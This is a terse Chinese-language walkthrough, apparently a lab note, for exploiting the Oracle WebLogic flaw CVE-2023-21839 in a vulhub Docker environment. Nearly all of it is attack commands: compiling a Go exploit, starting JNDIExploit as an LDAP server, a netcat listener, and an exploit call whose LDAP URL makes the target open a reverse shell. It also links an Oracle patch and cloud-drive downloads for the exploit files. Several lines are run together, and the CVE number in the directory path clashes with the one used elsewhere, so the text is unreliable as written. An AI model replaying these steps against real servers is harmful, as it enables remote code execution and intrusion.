cd /usr/local/soft/vulhub/weblogic/CVE-2023-21389 docker-compose build docker-compose up -d
2.漏洞环境:(12.2.1.3.0)
cd cmd
go build -o CVE-2023-21839.exe
起ldap服务: 1.准备JNDIExploit-1.4-SNAPSHOT.jar,为反弹shell做准备(java环境安装本文略过) java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.19.1342.监听端口
nc -l 9999CVE-2023-21839.exe -ip 192.168.19.134 -port 7001 -ldap ldap://192.168.19.134:1389/Basic/ReverseShell/192.168.19.134/9999补丁下载连接:
https://support.oracle.com/rs?type=doc&id=2917213.2
Weblogic-CVE-2023-21839poc文件下载地址:
链接:https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ
提取码:ps6q
Weblogic-CVE-2023-21839.jar下载:
链接:https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ
提取码:ps6q